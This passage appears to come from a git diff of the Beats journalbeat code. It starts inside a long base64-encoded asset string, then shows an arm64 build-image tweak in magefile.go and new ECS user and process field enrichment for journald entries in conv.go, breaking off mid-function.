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" } diff --git a/journalbeat/magefile.go b/journalbeat/magefile.go index 0644ce7d275f..46d962c69b42 100644 --- a/journalbeat/magefile.go +++ b/journalbeat/magefile.go @@ -21,6 +21,7 @@ package main import ( "fmt" + "runtime" "strings" "time" @@ -138,6 +139,9 @@ func selectImage(platform string) (string, error) { switch { case strings.HasPrefix(platform, "linux/arm"): tagSuffix = "arm" + if runtime.GOARCH == "arm64" { + tagSuffix = "base-arm-debian9" + } case strings.HasPrefix(platform, "linux/mips"): tagSuffix = "mips" case strings.HasPrefix(platform, "linux/ppc"): diff --git a/journalbeat/pkg/journalfield/conv.go b/journalbeat/pkg/journalfield/conv.go index 47214c3f91d9..703a1c677f61 100644 --- a/journalbeat/pkg/journalfield/conv.go +++ b/journalbeat/pkg/journalfield/conv.go @@ -19,6 +19,7 @@ package journalfield import ( "fmt" + "regexp" "strconv" "strings" @@ -84,7 +85,7 @@ func (c *Converter) Convert(entryFields map[string]string) common.MapStr { fields.Put("journald.custom", custom) } - return fields + return withECSEnrichment(fields) } func convertValue(fc Conversion, value string) (interface{}, error) { @@ -106,6 +107,91 @@ func convertValue(fc Conversion, value string) (interface{}, error) { return value, nil } +func withECSEnrichment(fields common.MapStr) common.MapStr { + // from https://www.freedesktop.org/software/systemd/man/systemd.journal-fields.html + // we see journald.object fields are populated by systemd on behalf of a different program + // so we want them to favor their use in root fields as they are the from the effective program + // performing the action. + setGidUidFields("journald", fields) + setGidUidFields("journald.object", fields) + setProcessFields("journald", fields) + setProcessFields("journald.object", fields) + return fields +} + +func setGidUidFields(prefix string, fields common.MapStr) { + var auditLoginUid string + if found, _ := fields.HasKey(prefix + ".audit.login_uid"); found { + auditLoginUid = fmt.Sprint(getIntegerFromFields(prefix+".audit.login_uid", fields)) + fields.Put("user.id", auditLoginUid) + } + + if found, _ := fields.HasKey(prefix + ".uid"); !found { + return + } + + uid := fmt.Sprint(getIntegerFromFields(prefix+".uid", fields)) + gid := fmt.Sprint(getIntegerFromFields(prefix+".gid", fields)) + if auditLoginUid != "" && 